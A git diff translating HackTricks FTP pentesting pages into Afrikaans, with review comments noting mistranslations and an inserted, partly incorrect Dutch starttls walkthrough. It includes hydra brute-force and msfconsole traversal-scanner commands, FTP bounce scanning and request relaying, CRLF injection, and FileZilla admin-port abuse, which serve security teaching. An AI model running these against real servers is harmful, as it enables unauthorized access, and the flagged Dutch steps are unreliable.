**`trace`** kan gebruik word om te sien **hoe die kommunikasie plaasvind**. -The **FTP** commands **`debug`** and **`trace`** can be used to see **how is the communication occurring**. 
- -## Enumeration - -### Banner Grabbing +## Enumerasie +### Banner Gaping ```bash nc -vn 21 openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any ``` +### Koppel aan FTP met behulp van starttls -### Connect to FTP using starttls +Om verbinding te maken met een FTP-server met behulp van starttls, moet je de volgende stappen volgen: +1. Gebruik een FTP-client zoals FileZilla of de commandoregelclient `ftp` om verbinding te maken met de FTP-server. +2. Verifieer of de FTP-server starttls ondersteunt. Dit kan worden gecontroleerd door de server te pingen of door de documentatie van de server te raadplegen. +3. Als de server starttls ondersteunt, moet je de FTP-client configureren om starttls te gebruiken. Dit kan meestal worden gedaan via de instellingen van de FTP-client. +4. Zodra starttls is ingeschakeld, kun je verbinding maken met de FTP-server zoals je normaal zou doen. De starttls-functie zorgt ervoor dat de communicatie tussen de client en de server wordt versleuteld. + +Het gebruik van starttls bij het verbinden met een FTP-server zorgt ervoor dat je gegevens veilig worden verzonden en beschermd zijn tegen afluisteren of onderschepping door kwaadwillende partijen. 
``` lftp lftp :~> set ftp:ssl-force true lftp :~> set ssl:verify-certificate no lftp :~> connect 10.10.10.208 -lftp 10.10.10.208:~> login +lftp 10.10.10.208:~> login Usage: login [] lftp 10.10.10.208:~> login username Password ``` +### Ongeoorloofde enumerasie -### Unauth enum - -With **nmap** - +Met **nmap** ```bash sudo nmap -sV -p21 -sC -A 10.10.10.10 ``` - -You can us the commands `HELP` and `FEAT` to obtain some information of the FTP server: - +Jy kan die opdragte `HELP` en `FEAT` gebruik om inligting oor die FTP-bediener te verkry: ``` HELP 214-The following commands are recognized (* =>'s unimplemented): -214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV -214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD -214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP -214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* -214-PBSZ PROT TYPE STRU MODE RETR STOR STOU -214-APPE REST ABOR USER PASS ACCT* REIN* LIST -214-NLST STAT SITE MLSD MLST +214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV +214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD +214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP +214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* +214-PBSZ PROT TYPE STRU MODE RETR STOR STOU +214-APPE REST ABOR USER PASS ACCT* REIN* LIST +214-NLST STAT SITE MLSD MLST 214 Direct comments to root@drei.work FEAT 211-Features: - PROT - CCC - PBSZ - AUTH TLS - MFF modify;UNIX.group;UNIX.mode; - REST STREAM - MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*; - UTF8 - EPRT - EPSV - LANG en-US - MDTM - SSCN - TVFS - MFMT - SIZE +PROT +CCC +PBSZ +AUTH TLS +MFF modify;UNIX.group;UNIX.mode; +REST STREAM +MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*; +UTF8 +EPRT +EPSV +LANG en-US +MDTM +SSCN +TVFS +MFMT +SIZE 211 End STAT #Info about the FTP server (version, configs, status...) ``` +### Anonieme aanmelding -### Anonymous login - -_anonymous : anonymous_\ -_anonymous :_\ +_anoniem : anoniem_\ +_anoniem :_\ _ftp : ftp_ - ```bash ftp >anonymous 
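Review bot: the `### Koppel aan FTP met behulp van starttls` section gains a five-step Dutch walkthrough ("Om verbinding te maken met een FTP-server met behulp van starttls, moet je de volgende stappen volgen...") that has no counterpart in the removed English text, where the heading is followed directly by the `lftp` transcript. Besides being in the wrong language for this PR, step 2 is incorrect: "door de server te pingen" tells you nothing about STARTTLS support, which is checked with `FEAT` (look for `AUTH TLS`, visible in the `FEAT` output further down this hunk) or with the `openssl s_client -connect ... -starttls ftp` command already shown under banner grabbing. Remove the inserted paragraphs. Further in this hunk: `_anonymous : anonymous_` and `_anonymous :_` under the anonymous-login heading were translated to `_anoniem : anoniem_` and `_anoniem :_`; these are literal credentials typed into the `ftp` client and must stay `anonymous`. `### Banner Gaping` should be `### Banner Grabbing` (gaping is yawning, and the term is kept in English in the finger page of this same patch). `### Ongeoorloofde enumerasie` means unauthorized enumeration; "Unauth enum" means enumeration without logging in, so "Enumerasie sonder aanmelding" or "Ongeverifieerde enumerasie" is the right rendering. The `HELP` and `FEAT` responses lost their leading-space indentation (`-214-CWD XCWD ...` vs `+214-CWD XCWD ...`, `- PROT` vs `+PROT`); that is a verbatim server transcript and the translation should not reflow it. Two wording fixes: `oor 'n rekenaarstelsel` renders "across a computer network", so `rekenaarnetwerk`; and `as die FTP-kliënt 'n vuurwal opset wat die inkomende data-verbindings van buite beheer` is missing its verb ("'n vuurwalopstelling het wat ...").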
@@ -128,115 +126,104 @@ ftp >ascii #Set transmission to ascii instead of binary >bye #exit ``` - ### [Brute force](../../generic-methodologies-and-resources/brute-force.md#ftp) -Here you can find a nice list with default ftp credentials: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt) +Hier kan jy 'n mooi lys vind met verstek ftp-geloofsbriewe: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt) -### Automated - -Anon login and bounce FTP checks are perform by default by nmap with **-sC** option or: +### Outomaties +Anon login en bounce FTP kontroles word standaard uitgevoer deur nmap met die **-sC** opsie of: ```bash nmap --script ftp-* -p 21 ``` +## Blaaier verbinding -## Browser connection - -You can connect to a FTP server using a browser (like Firefox) using a URL like: - +Jy kan 'n FTP-bediener verbind met 'n blaaier (soos Firefox) deur gebruik te maak van 'n URL soos: ```bash ftp://anonymous:anonymous@10.10.10.98 ``` +Merk op dat as 'n **webtoepassing** data wat deur 'n gebruiker beheer word **direk na 'n FTP-bediener** gestuur word, kan jy dubbele URL-kodering `%0d%0a` (in dubbele URL-kodering is dit `%250d%250a`) byte stuur en die **FTP-bediener arbitrêre aksies laat uitvoer**. Een van hierdie moontlike arbitrêre aksies is om inhoud van 'n gebruiker se beheerde bediener af te laai, poortskandering uit te voer of te probeer kommunikeer met ander dienste wat op platte teks gebaseer is (soos http). 
-Note that if a **web application** is sending data controlled by a user **directly to a FTP server** you can send double URL encode `%0d%0a` (in double URL encode this is `%250d%250a`) bytes and make the **FTP server perform arbitrary actions**. One of this possible arbitrary actions is to download content from a users controlled server, perform port scanning or try to talk to other plain-text based services (like http). - -## Download all files from FTP - +## Laai alle lêers vanaf FTP af ```bash wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all ``` - -If your user/password has special characters, the [following command](https://stackoverflow.com/a/113900/13647948) can be used: - +As jou gebruikersnaam/wagwoord spesiale karakters bevat, kan die [volgende opdrag](https://stackoverflow.com/a/113900/13647948) gebruik word: ```bash wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/ ``` +## Sommige FTP-opdragte -## Some FTP commands - -* **`USER username`** -* **`PASS password`** -* **`HELP`** The server indicates which commands are supported -* **`PORT 127,0,0,1,0,80`**This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). -* **`EPRT |2|127.0.0.1|80|`**This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. -* **`LIST`** This will send the list of files in current folder - * **`LIST -R`** List recursively (if allowed by the server) -* **`APPE /path/something.txt`** This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data. 
-* **`STOR /path/something.txt`** Like `APPE` but it will overwrite the files -* **`STOU /path/something.txt`** Like `APPE`, but if exists it won't do anything. -* **`RETR /path/to/file`** A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection -* **`REST 6`** This will indicate the server that next time it send something using `RETR` it should start in the 6th byte. -* **`TYPE i`** Set transfer to binary -* **`PASV`** This will open a passive connection and will indicate the user were he can connects -* **`PUT /tmp/file.txt`** Upload indicated file to the FTP +* **`USER gebruikersnaam`** +* **`PASS wagwoord`** +* **`HELP`** Die bediener dui aan watter opdragte ondersteun word +* **`PORT 127,0,0,1,0,80`** Dit sal die FTP-bediener aandui om 'n verbinding met die IP 127.0.0.1 op poort 80 te vestig (_jy moet die 5de karakter as "0" plaas en die 6de as die poort in desimaal of gebruik die 5de en 6de om die poort in heksadesimaal uit te druk_). +* **`EPRT |2|127.0.0.1|80|`** Dit sal die FTP-bediener aandui om 'n TCP-verbinding (_aangedui deur "2"_) met die IP 127.0.0.1 op poort 80 te vestig. Hierdie opdrag **ondersteun IPv6**. +* **`LIST`** Dit sal die lys van lêers in die huidige gids stuur +* **`LIST -R`** Lys rekursief (indien toegelaat deur die bediener) +* **`APPE /pad/iets.txt`** Dit sal die FTP aandui om die data wat ontvang is van 'n **passiewe** verbinding of van 'n **PORT/EPRT** verbinding na 'n lêer te stoor. As die lêernaam bestaan, sal dit die data byvoeg. +* **`STOR /pad/iets.txt`** Soos `APPE` maar dit sal die lêers oorskryf +* **`STOU /pad/iets.txt`** Soos `APPE`, maar as dit bestaan, sal dit niks doen nie. +* **`RETR /pad/na/lêer`** 'n Passiewe of 'n poortverbinding moet tot stand gebring word. 
Dan sal die FTP-bediener die aangeduide lêer deur daardie verbinding stuur +* **`REST 6`** Dit sal die bediener aandui dat volgende keer as dit iets stuur met behulp van `RETR`, moet dit begin by die 6de byte. +* **`TYPE i`** Stel oordrag na binêre in +* **`PASV`** Dit sal 'n passiewe verbinding oopmaak en die gebruiker aandui waar hy kan koppel +* **`PUT /tmp/lêer.txt`** Laai die aangeduide lêer na die FTP op ![](<../../.gitbook/assets/image (227).png>) -## FTPBounce attack +## FTPBounce-aanval -Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server. +Sommige FTP-bedieners laat die opdrag PORT toe. Hierdie opdrag kan gebruik word om aan die bediener aan te dui dat jy wil koppel aan 'n ander FTP-bediener by 'n sekere poort. Dan kan jy dit gebruik om te skandeer watter poorte van 'n gasheer oop is deur 'n FTP-bediener. -[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md) +[**Leer hier hoe om 'n FTP-bediener te misbruik om poorte te skandeer.**](ftp-bounce-attack.md) -You could also abuse this behaviour to make a FTP server interact with other protocols. You could **upload a file containing an HTTP request** and make the vulnerable FTP server **send it to an arbitrary HTTP server** (_maybe to add a new admin user?_) or even upload a FTP request and make the vulnerable FTP server download a file for a different FTP server.\ -The theory is easy: +Jy kan ook hierdie gedrag misbruik om 'n FTP-bediener te laat interaksie met ander protokolle. Jy kan **'n lêer oplaai wat 'n HTTP-versoek bevat** en die kwesbare FTP-bediener **stuur dit na 'n willekeurige HTTP-bediener** (_miskien om 'n nuwe administrateurgebruiker by te voeg?_) of selfs 'n FTP-versoek oplaai en die kwesbare FTP-bediener 'n lêer laat aflaai vir 'n ander FTP-bediener.\ +Die teorie is eenvoudig: -1. 
**Upload the request (inside a text file) to the vulnerable server.** Remember that if you want to talk with another HTTP or FTP server you need to change lines with `0x0d 0x0a` -2. **Use `REST X` to avoid sending the characters you don't want to send** (maybe to upload the request inside the file you needed to put some image header at the beginning) -3. **Use `PORT`to connect to the arbitrary server and service** -4. **Use `RETR`to send the saved request to the server.** +1. **Laai die versoek (binne 'n tekslêer) na die kwesbare bediener op.** Onthou dat as jy met 'n ander HTTP- of FTP-bediener wil praat, jy lyne met `0x0d 0x0a` moet verander +2. **Gebruik `REST X` om te voorkom dat jy die karakters stuur wat jy nie wil stuur nie** (miskien om die versoek binne die lêer te plaas, moes jy 'n beeldkop by die begin sit) +3. **Gebruik `PORT` om aan te sluit by die willekeurige bediener en diens** +4. **Gebruik `RETR` om die gestoorde versoek na die bediener te stuur.** -Its highly probably that this **will throw an error like** _**Socket not writable**_ **because the connection doesn't last enough to send the data with `RETR`**. Suggestions to try to avoid that are: +Dit is baie waarskynlik dat dit **'n fout sal veroorsaak soos** _**Socket not writable**_ **omdat die verbinding nie lank genoeg duur om die data met `RETR` te stuur nie**. Voorstelle om te probeer om dit te voorkom, is: -* If you are sending an HTTP request, **put the same request one after another** until **\~0.5MB** at least. Like this: +* As jy 'n HTTP-versoek stuur, **plaas dieselfde versoek agter mekaar** tot **\~0.5MB** ten minste. 
Soos hier: {% file src="../../.gitbook/assets/posts (1).txt" %} posts.txt {% endfile %} -* Try to **fill the request with "junk" data relative to the protocol** (talking to FTP maybe just junk commands or repeating the `RETR`instruction to get the file) -* Just **fill the request with a lot of null characters or others** (divided on lines or not) +* Probeer om **die versoek met "rommel" data te vul wat verband hou met die protokol** (as jy met FTP praat, dalk net rommelopdragte of die `RETR`-instruksie herhaal om die lêer te kry) +* Vul die versoek net met baie nulkarakters of ander karakters (verdeel op lyne of nie) -Anyway, here you have an [old example about how to abuse this to make a FTP server download a file from a different FTP server.](ftp-bounce-download-2oftp-file.md) +Hoe dan ook, hier het jy 'n [ou voorbeeld oor hoe om dit te misbruik om 'n FTP-bediener 'n lêer van 'n ander FTP-bediener te laat aflaai.](ftp-bounce-download-2oftp-file.md) -## Filezilla Server Vulnerability +## Filezilla Server-kwesbaarheid -**FileZilla** usually **binds** to **local** an **Administrative service** for the **FileZilla-Server** (port 14147). If you can create a **tunnel** from **your machine** to access this port, you can **connect** to **it** using a **blank password** and **create** a **new user** for the FTP service. - -## Config files +**FileZilla** bind gewoonlik aan 'n **plaaslike** Administratiewe diens vir die **FileZilla-Bediener** (poort 14147). As jy 'n **tonnel** van **jou masjien** kan skep om toegang tot hierdie poort te verkry, kan jy **daaraan koppel** deur 'n **leë wagwoord** te gebruik en 'n **nuwe gebruiker** vir die FTP-diens te skep. +## Konfigurasie-lêers ``` ftpusers ftp.conf proftpd.conf vsftpd.conf ``` +### Post-Exploitasie -### Post-Exploitation - -The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here, you could find some dangerous settings: +Die verstekkonfigurasie van vsFTPd kan gevind word in `/etc/vsftpd.conf`. 
Hierin kan jy 'n paar gevaarlike instellings vind: * `anonymous_enable=YES` * `anon_upload_enable=YES` * `anon_mkdir_write_enable=YES` -* `anon_root=/home/username/ftp` - Directory for anonymous. -* `chown_uploads=YES` - Change ownership of anonymously uploaded files -* `chown_username=username` - User who is given ownership of anonymously uploaded files -* `local_enable=YES` - Enable local users to login -* `no_anon_password=YES` - Do not ask anonymous for password -* `write_enable=YES` - Allow commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE +* `anon_root=/home/username/ftp` - Gids vir anonieme gebruikers. +* `chown_uploads=YES` - Verander eienaarskap van anoniem opgelaai lêers +* `chown_username=username` - Gebruiker wat eienaarskap van anoniem opgelaai lêers kry +* `local_enable=YES` - Stel plaaslike gebruikers in staat om aan te meld +* `no_anon_password=YES` - Moenie anoniem vir wagwoord vra nie +* `write_enable=YES` - Staaf opdragte toe: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, en SITE ### Shodan @@ -245,74 +232,70 @@ The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here,
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) vandag. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** - -## HackTricks Automatic Commands - ``` Protocol_Name: FTP #Protocol Abbreviation if there is one. Port_Number: 21 #Comma separated if there is more than one. Protocol_Description: File Transfer Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for FTP - Note: | - Anonymous Login - -bi <<< so that your put is done via binary +Name: Notes +Description: Notes for FTP +Note: | +Anonymous Login +-bi <<< so that your put is done via binary - wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59' - ^^to download all dirs and files +wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59' +^^to download all dirs and files - wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' - if PASV transfer is disabled +wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' +if PASV transfer is disabled - https://book.hacktricks.xyz/pentesting/pentesting-ftp +https://book.hacktricks.xyz/pentesting/pentesting-ftp Entry_2: - Name: Banner Grab - Description: Grab FTP Banner via telnet - Command: telnet -n {IP} 21 +Name: Banner Grab +Description: Grab FTP Banner via telnet +Command: telnet -n {IP} 21 Entry_3: - Name: Cert Grab - Description: Grab FTP 
Certificate if existing - Command: openssl s_client -connect {IP}:21 -starttls ftp +Name: Cert Grab +Description: Grab FTP Certificate if existing +Command: openssl s_client -connect {IP}:21 -starttls ftp Entry_4: - Name: nmap ftp - Description: Anon login and bounce FTP checks are performed - Command: nmap --script ftp-* -p 21 {IP} +Name: nmap ftp +Description: Anon login and bounce FTP checks are performed +Command: nmap --script ftp-* -p 21 {IP} Entry_5: - Name: Browser Connection - Description: Connect with Browser - Note: ftp://anonymous:anonymous@{IP} +Name: Browser Connection +Description: Connect with Browser +Note: ftp://anonymous:anonymous@{IP} Entry_6: - Name: Hydra Brute Force - Description: Need Username - Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp - -Entry_7: - Name: consolesless mfs enumeration ftp - Description: FTP enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' -``` +Name: Hydra Brute Force +Description: Need Username +Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp +Entry_7: +Name: consolesless mfs enumeration ftp +Description: FTP enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set 
RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
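Review bot: the last hunk deletes the `## HackTricks Automatic Commands` heading (`-## HackTricks Automatic Commands -`) without any Afrikaans replacement, so the trailing command block now follows the `***` rule with no title, and the block itself has had its two-space indentation stripped (`- Name: Notes` becomes `+Name: Notes`, `- Command: telnet -n {IP} 21` becomes `+Command: telnet -n {IP} 21`). Those keys are nested under `Entry_1:` through `Entry_7:`, so removing the indent changes the structure of what was a valid YAML-style fragment that tooling may parse; the translation should leave this fenced block untouched, as it does the other code blocks. Restore the heading (e.g. `## HackTricks Outomatiese Opdragte`) and the original indentation, and likewise the indentation and blank lines removed around the vsFTPd and `wget` blocks in the previous hunk. Smaller points in these two hunks: the `write_enable=YES` description `Staaf opdragte toe` means "prove commands"; "Laat opdragte toe" is the intended "Allow commands". In the `## Sommige FTP-opdragte` list the arguments inside backticks are command syntax, so `USER gebruikersnaam`, `PASS wagwoord` and `PUT /tmp/lêer.txt` should keep the English placeholders (`USER username`, `PASS password`, `PUT /tmp/file.txt`) to match the untranslated code elsewhere in the book; translating prose around them is fine.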
diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md index 22f8e7a2d..704a24828 100644 --- a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md +++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md @@ -1,65 +1,58 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# FTP Bounce - Scanning +# FTP Bounce - Skandering -## Manual +## Handleiding -1. Connect to vulnerable FTP -2. Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\_ you want to scan: +1. Koppel aan die kwesbare FTP +2. Gebruik **`PORT`** of **`EPRT`** (maar slegs een van hulle) om dit te laat 'n verbinding met die _\_ wat jy wil skandeer, te vestig: - `PORT 172,32,80,80,0,8080`\ - `EPRT |2|172.32.80.80|8080|` -3. Use **`LIST`**(this will just send to the connected _\_ the list of current files in the FTP folder) and check for the possible responses: `150 File status okay` (This means the port is open) or `425 No connection established` (This means the port is closed) - 1. Instead of `LIST` you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses. +`PORT 172,32,80,80,0,8080`\ +`EPRT |2|172.32.80.80|8080|` +3. Gebruik **`LIST`** (dit sal net die huidige lys van lêers in die FTP-lys na die gekoppelde _\_ stuur) en kyk na die moontlike antwoorde: `150 File status okay` (Dit beteken die poort is oop) of `425 No connection established` (Dit beteken die poort is toe) +1. In plaas van `LIST` kan jy ook **`RETR /file/in/ftp`** gebruik en soek na soortgelyke `Open/Close`-antwoorde. 
-Example Using **PORT** (port 8080 of 172.32.80.80 is open and port 7777 is closed): +Voorbeeld van gebruik van **PORT** (poort 8080 van 172.32.80.80 is oop en poort 7777 is toe): ![](<../../.gitbook/assets/image (225).png>) -Same example using **`EPRT`**(authentication omitted in the image): +Dieselfde voorbeeld met behulp van **`EPRT`** (verifikasie weggelaat in die prent): ![](<../../.gitbook/assets/image (226).png>) -Open port using `EPRT` instead of `LIST` (different env) +Oop poort met behulp van `EPRT` in plaas van `LIST` (verskillende omgewing) ![](<../../.gitbook/assets/image (228).png>) ## **nmap** - ```bash nmap -b :@ nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
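Review bot: In the ftp-bounce-attack.md hunk the translated list loses the indentation that nested the `PORT`/`EPRT` example lines under step 2 and the `1. In plaas van LIST ...` sub-item under step 3, so Markdown now renders the examples as a stand-alone paragraph and the sub-item as a new list restarting at 1; keep the original leading spaces on those `+` lines so they stay nested. Also, `## Manual` here means "by hand" and should be `## Handmatig`, not `## Handleiding` (a handbook); the same mistranslation recurs in the pentesting-irc.md hunk further down. In step 3, "FTP-lys" should be "FTP-gids" (the FTP folder).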
- - diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index da1b22f4d..12fd39044 100644 --- a/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -1,56 +1,52 @@ - -
